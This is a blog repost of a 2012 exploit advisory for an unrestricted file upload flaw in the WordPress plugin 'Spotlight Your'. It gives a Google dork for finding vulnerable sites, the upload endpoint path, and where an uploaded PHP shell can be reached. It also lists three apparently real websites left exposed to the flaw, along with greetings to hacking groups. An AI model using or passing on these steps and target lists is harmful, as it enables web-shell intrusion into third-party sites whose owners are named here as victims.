J2TEAM Security: A must-have extension for Chrome users. Install now!

Wordpress Plugins Spotlight Your Upload Vulnerability

Wordpress Plugins Spotlight Your Upload Vulnerability | Juno_okyo's Blog
___________.__             _________                             _________                     
\__    ___/|  |__   ____   \_   ___ \______  ______  _  ________ \_   ___ \______  ______  _  __
|    |   |  |  \_/ __ \  /    \  \|_  __ \/  _ \ \/ \/ /  ___/ /    \  \|_  __ \/ __ \ \/ \/ /
|    |   |   Y  \  ___/  \     \___|  | \(  <_> )     /\___ \  \     \___|  | \|  ___/\     /
|____|   |___|  /\___  >  \______  /__|   \____/ \/\_//____  >  \______  /__|   \___  >\/\_/ 
\/     \/          \/                        \/          \/           \/       
 
INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.com
#################################################################################################
 
[+] POC
 
Exp. Target :
- http://domain.com/wp-content/plugins/spotlightyour/
 
Exploit :
- /monetize/upload/index.php
 
Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php
 
Ending :
- Fraksi Bejoug a.k.a Kalam Saheru
Saparatoss Blank Blank
awkwkwkwk :v
 
http://beautyexo.com/wp-content/plugins/spotlightyour/monetize/upload/
 
http://www.promogotion.com/wp-content/plugins/spotlightyour/monetize/upload/
 
http://shopping.businessminister.com/wp-content/plugins/spotlightyour/monetize/upload/
 
#################################################################################################
 
Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, -=[The Crows Crew]=-, Indonesian Hacker
 
thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
 
########################################[end]####################################################
 
# 1337day.com [2012-11-19]
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!